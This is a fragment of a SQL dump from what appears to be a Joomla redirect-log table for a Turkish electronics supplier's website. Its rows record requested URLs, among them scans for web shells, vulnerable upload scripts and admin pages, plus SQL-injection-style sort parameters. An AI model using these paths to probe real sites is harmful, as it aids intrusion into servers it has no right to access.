00:00:00',301),(18793,'http://www.3s-technologies.com.tr/tr/?option=com_jambook',NULL,'','',6,0,'2018-03-03 13:18:29','0000-00-00 00:00:00',301),(18794,'http://www.3s-technologies.com.tr/tr/component/jambook',NULL,'','',12,0,'2018-03-03 13:18:30','0000-00-00 00:00:00',301),(18795,'http://www.3s-technologies.com.tr/tr/guestbook',NULL,'','',18,0,'2018-03-03 13:18:30','0000-00-00 00:00:00',301),(18796,'http://www.3s-technologies.com.tr/tr/?option=com_phocaguestbook&id=1',NULL,'','',6,0,'2018-03-03 13:18:31','0000-00-00 00:00:00',301),(18797,'http://www.3s-technologies.com.tr/tr/?option=com_phocaguestbook',NULL,'','',6,0,'2018-03-03 13:18:31','0000-00-00 00:00:00',301),(18798,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,ordering/results,1-15',NULL,'','',2,0,'2018-03-03 15:09:19','0000-00-00 00:00:00',301),(18799,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/dirdesc',NULL,'','',1,0,'2018-03-03 16:35:43','0000-00-00 00:00:00',301),(18800,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46&itemid=62&lang=tr',NULL,'','',14,0,'2018-03-03 17:04:30','0000-00-00 00:00:00',301),(18801,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,ordering/results,1-60',NULL,'','',1,0,'2018-03-03 17:33:19','0000-00-00 00:00:00',301),(18802,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,ordering/results,1-150',NULL,'','',1,0,'2018-03-03 18:30:54','0000-00-00 00:00:00',301),(18803,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_sku/results,1-60',NULL,'','',2,0,'2018-03-03 20:14:06','0000-00-00 00:00:00',301),(18804,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_sku/results,1-15',NULL,'','',6,0,'2018-03-03 21:44:05','0000-00-00 00:00:00',301),(18805,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_sku/results,1-30',NULL,'','',5,0,'2018-03-03 23:29:05','0000-00-00 00:00:00',301),(18806,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/results,1-60',NULL,'','',1,0,'2018-03-03 23:34:19','0000-00-00 00:00:00',301),(18807,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_sku/results,1-150',NULL,'','',7,0,'2018-03-04 01:29:05','0000-00-00 00:00:00',301),(18808,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/results,1-30',NULL,'','',2,0,'2018-03-04 02:29:05','0000-00-00 00:00:00',301),(18809,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/results,1-150',NULL,'','',1,0,'2018-03-04 03:02:02','0000-00-00 00:00:00',301),(18810,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/results,1-15',NULL,'','',1,0,'2018-03-04 03:59:04','0000-00-00 00:00:00',301),(18811,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/results,1-60',NULL,'','',1,0,'2018-03-04 05:59:04','0000-00-00 00:00:00',301),(18812,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/results,1-150',NULL,'','',1,0,'2018-03-04 06:59:04','0000-00-00 00:00:00',301),(18813,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/results,1-15',NULL,'','',4,0,'2018-03-04 08:16:40','0000-00-00 00:00:00',301),(18814,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=section&id=6&itemid=1&lang=tr',NULL,'','',1,0,'2018-03-04 08:43:02','0000-00-00 00:00:00',301),(18815,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/results,1-30',NULL,'','',1,0,'2018-03-04 09:34:55','0000-00-00 00:00:00',301),(18816,'http://3s-technologies.com.tr/tr/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/tr/uploadify/uploadify.css','',5,0,'2018-03-04 10:28:39','0000-00-00 00:00:00',301),(18817,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/results,1-60',NULL,'','',3,0,'2018-03-04 11:08:50','0000-00-00 00:00:00',301),(18818,'http://3s-technologies.com.tr/tr/test.php',NULL,'http://site.ru','',186,0,'2018-03-04 12:02:16','0000-00-00 00:00:00',301),(18819,'http://3s-technologies.com.tr/tr/wp-admin',NULL,'','',268,0,'2018-03-04 12:43:52','0000-00-00 00:00:00',301),(18820,'https://3s-technologies.com.tr/tr/wp-admin',NULL,'','',25,0,'2018-03-04 12:43:53','0000-00-00 00:00:00',301),(18821,'http://3s-technologies.com.tr/tr/license.txt',NULL,'','',14,0,'2018-03-04 12:43:53','0000-00-00 00:00:00',301),(18822,'https://3s-technologies.com.tr/tr/license.txt',NULL,'','',11,0,'2018-03-04 12:43:53','0000-00-00 00:00:00',301),(18823,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/results,1-150',NULL,'','',1,0,'2018-03-04 12:58:24','0000-00-00 00:00:00',301),(18824,'http://3s-technologies.com.tr/en/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/uploadify/uploadify.css','',2,0,'2018-03-04 13:02:52','0000-00-00 00:00:00',301),(18825,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku/results,1-10',NULL,'','',1,0,'2018-03-04 13:15:49','0000-00-00 00:00:00',301),(18826,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,`p`.product_sku/dirdesc',NULL,'','',10,0,'2018-03-04 14:16:39','0000-00-00 00:00:00',301),(18827,'http://3s-technologies.com.tr/tr/bigm.php',NULL,'http://site.ru','',6,0,'2018-03-04 16:16:55','0000-00-00 00:00:00',301),(18828,'http://3s-technologies.com.tr/tr/_.php',NULL,'http://site.ru','',9,0,'2018-03-04 16:17:42','0000-00-00 00:00:00',301),(18829,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,`p`.product_sku/results,1-15',NULL,'','',1,0,'2018-03-04 17:08:50','0000-00-00 00:00:00',301),(18830,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,`p`.product_sku/results,1-60',NULL,'','',2,0,'2018-03-04 18:12:28','0000-00-00 00:00:00',301),(18831,'http://3s-technologies.com.tr/tr/theme.php',NULL,'http://site.ru','',53,0,'2018-03-04 19:37:53','0000-00-00 00:00:00',301),(18832,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/results,1-5',NULL,'','',3,0,'2018-03-04 19:44:57','0000-00-00 00:00:00',301),(18833,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,`p`.product_sku/results,1-150',NULL,'','',5,0,'2018-03-04 20:12:27','0000-00-00 00:00:00',301),(18834,'http://3s-technologies.com.tr/tr/ler.php',NULL,'http://site.ru','',12,0,'2018-03-04 20:35:49','0000-00-00 00:00:00',301),(18835,'http://3s-technologies.com.tr/tr/lib.php',NULL,'http://site.ru','',130,0,'2018-03-04 21:16:53','0000-00-00 00:00:00',301),(18836,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslidersa/help.php',NULL,'http://site.ru','',1,0,'2018-03-04 21:20:16','0000-00-00 00:00:00',301),(18837,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/dirdesc/results,1-60',NULL,'','',5,0,'2018-03-04 21:24:27','0000-00-00 00:00:00',301),(18838,'http://3s-technologies.com.tr/tr/images/cgi.php',NULL,'http://site.ru','',3,0,'2018-03-04 22:06:07','0000-00-00 00:00:00',301),(18839,'http://3s-technologies.com.tr/tr/images/license.php',NULL,'http://site.ru','',4,0,'2018-03-04 23:08:40','0000-00-00 00:00:00',301),(18840,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/dirdesc/results,1-30',NULL,'','',1,0,'2018-03-04 23:48:27','0000-00-00 00:00:00',301),(18841,'http://3s-technologies.com.tr/en/contact-form.php',NULL,'','',1,0,'2018-03-05 01:23:45','0000-00-00 00:00:00',301),(18842,'http://3s-technologies.com.tr/en/contact',NULL,'','',2,0,'2018-03-05 01:23:46','0000-00-00 00:00:00',301),(18843,'http://3s-technologies.com.tr/en/index.php/contactez-nous',NULL,'','',1,0,'2018-03-05 01:23:48','0000-00-00 00:00:00',301),(18844,'http://3s-technologies.com.tr/en/nous-contacter',NULL,'','',1,0,'2018-03-05 01:23:51','0000-00-00 00:00:00',301),(18845,'http://3s-technologies.com.tr/en/contactenos',NULL,'','',1,0,'2018-03-05 01:23:52','0000-00-00 00:00:00',301),(18846,'http://3s-technologies.com.tr/en/contact-us',NULL,'','',1,0,'2018-03-05 01:23:54','0000-00-00 00:00:00',301),(18847,'http://3s-technologies.com.tr/en/contactanos',NULL,'','',1,0,'2018-03-05 01:23:56','0000-00-00 00:00:00',301),(18848,'http://3s-technologies.com.tr/en/contattaci',NULL,'','',2,0,'2018-03-05 01:23:59','0000-00-00 00:00:00',301),(18849,'http://3s-technologies.com.tr/en/index.php/kontakt',NULL,'','',1,0,'2018-03-05 01:24:01','0000-00-00 00:00:00',301),(18850,'http://3s-technologies.com.tr/en/kontakt-os',NULL,'','',1,0,'2018-03-05 01:24:03','0000-00-00 00:00:00',301),(18851,'http://3s-technologies.com.tr/en/contact-pog',NULL,'','',1,0,'2018-03-05 01:24:05','0000-00-00 00:00:00',301),(18852,'http://3s-technologies.com.tr/en/contact-us.html',NULL,'','',1,0,'2018-03-05 01:24:07','0000-00-00 00:00:00',301),(18853,'http://3s-technologies.com.tr/en/contacten.html',NULL,'','',1,0,'2018-03-05 01:24:09','0000-00-00 00:00:00',301),(18854,'http://3s-technologies.com.tr/en/kontakty.html',NULL,'','',1,0,'2018-03-05 01:24:10','0000-00-00 00:00:00',301),(18855,'http://3s-technologies.com.tr/en/kontakt',NULL,'','',1,0,'2018-03-05 01:24:16','0000-00-00 00:00:00',301),(18856,'http://3s-technologies.com.tr/en/android_contact_name',NULL,'','',1,0,'2018-03-05 01:24:18','0000-00-00 00:00:00',301),(18857,'http://3s-technologies.com.tr/en/contactez-nous',NULL,'','',1,0,'2018-03-05 01:24:21','0000-00-00 00:00:00',301),(18858,'http://3s-technologies.com.tr/en/contacto',NULL,'','',1,0,'2018-03-05 01:24:22','0000-00-00 00:00:00',301),(18859,'http://3s-technologies.com.tr/en/contattarci',NULL,'','',1,0,'2018-03-05 01:24:27','0000-00-00 00:00:00',301),(18860,'http://3s-technologies.com.tr/en/kontaktieren-sie-uns',NULL,'','',1,0,'2018-03-05 01:24:28','0000-00-00 00:00:00',301),(18861,'http://3s-technologies.com.tr/en/contatti',NULL,'','',1,0,'2018-03-05 01:24:29','0000-00-00 00:00:00',301),(18862,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/smd-fırın/dirdesc/results,1-50',NULL,'','',1,0,'2018-03-05 03:09:28','0000-00-00 00:00:00',301),(18863,'http://3s-technologies.com.tr/tr/modules/mod_fxprev/libraries/wp-post.php',NULL,'http://site.ru','',1,0,'2018-03-05 06:39:16','0000-00-00 00:00:00',301),(18864,'http://3s-technologies.com.tr/tr/components/com_foxcontact/line.php',NULL,'http://site.ru','',2,0,'2018-03-05 07:29:18','0000-00-00 00:00:00',301),(18865,'http://3s-technologies.com.tr/tr/components/com_foxcontact/line.php',NULL,'http://site.ru','',1,0,'2018-03-05 07:29:18','0000-00-00 00:00:00',301),(18866,'http://3s-technologies.com.tr/tr/components/com_creativecontactform/fileupload/files/shell.php',NULL,'http://3s-technologies.com.tr/tr/components/com_creativecontactform/fileupload/files/shell.php','',1,0,'2018-03-05 08:22:01','0000-00-00 00:00:00',301),(18867,'http://3s-technologies.com.tr/en/components/com_creativecontactform/fileupload/files/shell.php',NULL,'http://3s-technologies.com.tr/components/com_creativecontactform/fileupload/files/shell.php','',1,0,'2018-03-05 11:18:39','0000-00-00 00:00:00',301),(18868,'http://3s-technologies.com.tr/tr/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'http://3s-technologies.com.tr/tr/index.php?option=com_adsmanager&task=upload&tmpl=component','',9,0,'2018-03-05 15:37:57','0000-00-00 00:00:00',301),(18869,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/cherry-plugin/admin/css/cherry-admin-plugin.css',NULL,'','',4,0,'2018-03-05 18:20:12','0000-00-00 00:00:00',301),(18870,'http://3s-technologies.com.tr/en/?option=com_adsmanager&task=upload&tmpl=component',NULL,'http://3s-technologies.com.tr/index.php?option=com_adsmanager&task=upload&tmpl=component','',11,0,'2018-03-05 18:45:28','0000-00-00 00:00:00',301),(18871,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/user',NULL,'','',1,0,'2018-03-05 20:20:22','0000-00-00 00:00:00',301),(18872,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslidersa/098.php',NULL,'http://site.ru','',2,0,'2018-03-06 00:49:47','0000-00-00 00:00:00',301),(18873,'http://3s-technologies.com.tr/tr/pamelas.php',NULL,'http://site.ru','',6,0,'2018-03-06 02:50:17','0000-00-00 00:00:00',301),(18874,'http://3s-technologies.com.tr/tr/user.php',NULL,'http://site.ru','',149,0,'2018-03-06 04:28:11','0000-00-00 00:00:00',301),(18875,'http://3s-technologies.com.tr/tr/so.php',NULL,'http://site.ru','',5,0,'2018-03-06 05:30:28','0000-00-00 00:00:00',301),(18876,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,pc.ordering,product_name',NULL,'','',4,0,'2018-03-06 13:39:10','0000-00-00 00:00:00',301),(18877,'https://www.3s-technologies.com.tr/en/products/smd-ultra-hız/mx200lp-3-detail',NULL,'https://yandex.com.tr/clck/jsredir?from=yandex.com.tr%3Bgorsel%2Fsearch%3Bimages%3B%3B&text=&etext=1717.9L45lBoCoreQQlliwo0TS7-wp6tw-GUWtTuFhZB2978EcemLA-cgszcyudwtzTpu.7712b5584076e99a7a479f6fe9a407aec732198c&uuid=&state=tid_Wvm4RM28ca_MiO4Ne9osTPtpHS9wicjEF5X7fRziVPIHCd9FyQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXSG5qazRzSm1fQWh3cWlfeTBjakJqNXRvZERoTTVTZkg0RFEtZmM1T09uczA4ajdMOWExTExxTWkySUVpcjFiaGk5UllMYnc0ck9HWU5PMGpUV3FhV2lKR3YtNGFSUDhQVTNsYk9rZ2h0Y2Y4VVlxRzdMQ2Zadk9KRXJhc0drVUVDdldmNHRDcDdHZlZSem8yRmxLdERRdm15SFZ6cUdlSWlLbmNJQThSSktI&sign=3a9f854aeaa0664930a985801024e97d&keyno=0&b64e=2&l10n=tr','',2,0,'2018-03-06 14:53:18','0000-00-00 00:00:00',301),(18878,'https://www.3s-technologies.com.tr/en/favicon.ico',NULL,'https://www.3s-technologies.com.tr/en/products/smd-ultra-h%C4%B1z/mx200lp-3-detail','',6,0,'2018-03-06 14:53:20','0000-00-00 00:00:00',301),(18879,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,pc.ordering,product_name/dirdesc',NULL,'','',4,0,'2018-03-06 14:57:26','0000-00-00 00:00:00',301),(18880,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,pc.ordering,product_name/results,1-60',NULL,'','',4,0,'2018-03-06 19:16:47','0000-00-00 00:00:00',301),(18881,'http://3s-technologies.com.tr/administrator/administrator.php',NULL,'','',9,0,'2018-03-06 19:26:49','0000-00-00 00:00:00',301),(18882,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,pc.ordering,product_name/results,1-15',NULL,'','',2,0,'2018-03-06 21:02:14','0000-00-00 00:00:00',301),(18883,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/?categorylayout=0&showcategory=1&showproducts=1&showsearch=1&productsublayout=0&latest=0&topten=0&recent=0',NULL,'','',12,0,'2018-03-06 22:14:34','0000-00-00 00:00:00',301),(18884,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,pc.ordering,product_name/results,1-30',NULL,'','',1,0,'2018-03-07 00:29:30','0000-00-00 00:00:00',301),(18885,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,product_sku/results,1-20',NULL,'','',1,0,'2018-03-07 07:40:40','0000-00-00 00:00:00',301),(18886,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,pc.ordering,product_name/results,1-150',NULL,'','',1,0,'2018-03-07 09:43:49','0000-00-00 00:00:00',301),(18887,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2018-03-07 10:02:48','0000-00-00 00:00:00',301),(18888,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,`p`.product_sku/results,1-50',NULL,'','',2,0,'2018-03-07 11:37:32','0000-00-00 00:00:00',301),(18889,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,mf_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-03-07 11:50:24','0000-00-00 00:00:00',301),(18890,'http://3s-technologies.com.tr/tr/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php','',2,0,'2018-03-07 13:39:49','0000-00-00 00:00:00',301),(18891,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-03-07 13:59:36','0000-00-00 00:00:00',301),(18892,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2018-03-07 14:55:43','0000-00-00 00:00:00',301),(18893,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',4,0,'2018-03-07 15:51:05','0000-00-00 00:00:00',301),(18894,'http://3s-technologies.com.tr/en/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php',NULL,'http://3s-technologies.com.tr/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php','',3,0,'2018-03-07 16:31:36','0000-00-00 00:00:00',301),(18895,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,category_name/dirdesc/results,1-50',NULL,'','',7,0,'2018-03-07 17:14:10','0000-00-00 00:00:00',301),(18896,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/screen-printer/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',3,0,'2018-03-07 18:37:14','0000-00-00 00:00:00',301),(18897,'http://3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','',27,0,'2018-03-08 03:38:47','0000-00-00 00:00:00',301),(18898,'http://3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2018-03-08 03:38:47','0000-00-00 00:00:00',301),(18899,'http://3s-technologies.com.tr/tr/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','',4,0,'2018-03-08 03:38:50','0000-00-00 00:00:00',301),(18900,'http://3s-technologies.com.tr/en/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','',11,0,'2018-03-08 06:47:40','0000-00-00 00:00:00',301),(18901,'http://3s-technologies.com.tr/en/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','',1,0,'2018-03-08 06:47:41','0000-00-00 00:00:00',301),(18902,'http://3s-technologies.com.tr/tr/wp-content/plugins/formcraft/file-upload/server/content/upload.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/formcraft/file-upload/server/content/upload.php','',8,0,'2018-03-08 12:04:11','0000-00-00 00:00:00',301),(18903,'http://3s-technologies.com.tr/en/wp-content/plugins/formcraft/file-upload/server/content/upload.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/formcraft/file-upload/server/content/upload.php','',3,0,'2018-03-08 15:04:27','0000-00-00 00:00:00',301),(18904,'http://3s-technologies.com.tr/tr/cache/an.php',NULL,'','',1,0,'2018-03-08 16:59:16','0000-00-00 00:00:00',301),(18905,'http://3s-technologies.com.tr/tr/plugins/system/nnframework/language/ru-ru/odpni.php',NULL,'','',1,0,'2018-03-08 17:08:01','0000-00-00 00:00:00',301),(18906,'http://3s-technologies.com.tr/head.php',NULL,'','',1,0,'2018-03-08 21:04:09','0000-00-00 00:00:00',301),(18907,'http://3s-technologies.com.tr/tr/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','',2,0,'2018-03-09 12:52:21','0000-00-00 00:00:00',301),(18908,'http://3s-technologies.com.tr/en/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','',2,0,'2018-03-09 16:05:12','0000-00-00 00:00:00',301),(18909,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,`p`.product_sku/results,1-30',NULL,'','',4,0,'2018-03-09 17:00:09','0000-00-00 00:00:00',301),(18910,'http://3s-technologies.com.tr/media/system/images/tmps/hxcdm.php',NULL,'','',1,0,'2018-03-09 19:33:24','0000-00-00 00:00:00',301),(18911,'http://3s-technologies.com.tr/language/en-gb/en-gb.mod.php',NULL,'','',1,0,'2018-03-09 19:53:37','0000-00-00 00:00:00',301),(18912,'http://3s-technologies.com.tr/tmp/install.php',NULL,'','',1,0,'2018-03-09 20:45:12','0000-00-00 00:00:00',301),(18913,'http://3s-technologies.com.tr/qq.php',NULL,'','',6,0,'2018-03-09 20:58:12','0000-00-00 00:00:00',301),(18914,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/dirdesc/results,1-60',NULL,'','',3,0,'2018-03-10 00:48:29','0000-00-00 00:00:00',301),(18915,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/dirdesc/results,1-30',NULL,'','',5,0,'2018-03-10 03:10:49','0000-00-00 00:00:00',301),(18916,'http://3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,mf_name',NULL,'','',9,0,'2018-03-10 04:01:03','0000-00-00 00:00:00',301),(18917,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_name/dirdesc/results,1-150',NULL,'','',1,0,'2018-03-10 05:16:22','0000-00-00 00:00:00',301),(18918,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/dirdesc/results,1-15',NULL,'','',3,0,'2018-03-10 07:30:19','0000-00-00 00:00:00',301),(18919,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/dirdesc/results,1-60',NULL,'','',11,0,'2018-03-10 08:37:17','0000-00-00 00:00:00',301),(18920,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/dirdesc/results,1-150',NULL,'','',3,0,'2018-03-10 09:35:20','0000-00-00 00:00:00',301),(18921,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,`p`.product_sku/dirdesc/results,1-15',NULL,'','',6,0,'2018-03-10 09:40:00','0000-00-00 00:00:00',301),(18922,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,`p`.product_sku/dirdesc/results,1-30',NULL,'','',1,0,'2018-03-10 11:56:12','0000-00-00 00:00:00',301),(18923,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,`p`.product_sku/dirdesc/results,1-60',NULL,'','',5,0,'2018-03-10 12:58:48','0000-00-00 00:00:00',301),(18924,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc/results,1-10',NULL,'','',1,0,'2018-03-10 14:04:17','0000-00-00 00:00:00',301),(18925,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,`p`.product_sku/dirdesc/results,1-150',NULL,'','',3,0,'2018-03-10 14:09:14','0000-00-00 00:00:00',301),(18926,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,pc.ordering,product_name/dirdesc/results,1-15',NULL,'','',3,0,'2018-03-10 16:06:37','0000-00-00 00:00:00',301),(18927,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=157:spartan-8s8d&catid=44:pota&itemid=158&lang=en',NULL,'','',4,0,'2018-03-10 16:14:27','0000-00-00 00:00:00',301),(18928,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,pc.ordering,product_name/dirdesc/results,1-30',NULL,'','',3,0,'2018-03-10 17:17:03','0000-00-00 00:00:00',301),(18929,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,pc.ordering,product_name/dirdesc/results,1-60',NULL,'','',7,0,'2018-03-10 18:35:19','0000-00-00 00:00:00',301),(18930,'http://3s-technologies.com.tr/tr/cfg.php',NULL,'','',1,0,'2018-03-10 22:26:20','0000-00-00 00:00:00',301),(18931,'http://3s-technologies.com.tr/tr/images/.jindex.php',NULL,'','',1,0,'2018-03-10 22:52:07','0000-00-00 00:00:00',301),(18932,'http://3s-technologies.com.tr/tr/.config.php',NULL,'','',1,0,'2018-03-10 22:52:08','0000-00-00 00:00:00',301),(18933,'http://3s-technologies.com.tr/tr/tmp/.jindex.php',NULL,'','',1,0,'2018-03-10 23:03:54','0000-00-00 00:00:00',301),(18934,'http://3s-technologies.com.tr/tr/components/com_b2jcontact/js/fileuploader.js',NULL,'','',8,0,'2018-03-11 00:31:17','0000-00-00 00:00:00',301),(18935,'https://www.3s-technologies.com.tr/tr/urunler/screen-printer/sp-18p-l-detail',NULL,'','',1,0,'2018-03-11 02:14:03','0000-00-00 00:00:00',301),(18936,'http://3s-technologies.com.tr/tr/https:/www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:49:47','0000-00-00 00:00:00',301),(18937,'http://3s-technologies.com.tr/en/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:13','0000-00-00 00:00:00',301),(18938,'http://3s-technologies.com.tr/tr/https://www.ledbazaar.net',NULL,'','',1,0,'2018-03-11 09:50:20','0000-00-00 00:00:00',301),(18939,'http://3s-technologies.com.tr/tr/media/jui/js/).html(n.highlighter(r)),t[0]}),t.first().addclass(',NULL,'','',1,0,'2018-03-11 09:50:24','0000-00-00 00:00:00',301),(18940,'http://3s-technologies.com.tr/tr/media/jui/js/)[this.options.html',NULL,'','',1,0,'2018-03-11 09:50:25','0000-00-00 00:00:00',301),(18941,'http://3s-technologies.com.tr/tr/media/jui/js/).length,l.html5clone=',NULL,'','',1,0,'2018-03-11 09:50:26','0000-00-00 00:00:00',301),(18942,'http://3s-technologies.com.tr/tr/media/jui/js/).length,l.htmlserialize=!!a.getelementsbytagname(',NULL,'','',1,0,'2018-03-11 09:50:26','0000-00-00 00:00:00',301),(18943,'http://3s-technologies.com.tr/tr/media/jui/js/,data:b}).done(function(a){f=arguments,g.html(d?n(',NULL,'','',1,0,'2018-03-11 09:50:27','0000-00-00 00:00:00',301),(18944,'http://3s-technologies.com.tr/tr/media/jui/js/],_default:l.htmlserialize?[0,',NULL,'','',1,0,'2018-03-11 09:50:29','0000-00-00 00:00:00',301),(18945,'http://3s-technologies.com.tr/tr/media/system/js/);e--;)k=k.firstchild;this.empty().adopt(k.childnodes);q||u.removechild(f)}}(element.properties.html.set);b=document.createelement(',NULL,'','',1,0,'2018-03-11 09:50:32','0000-00-00 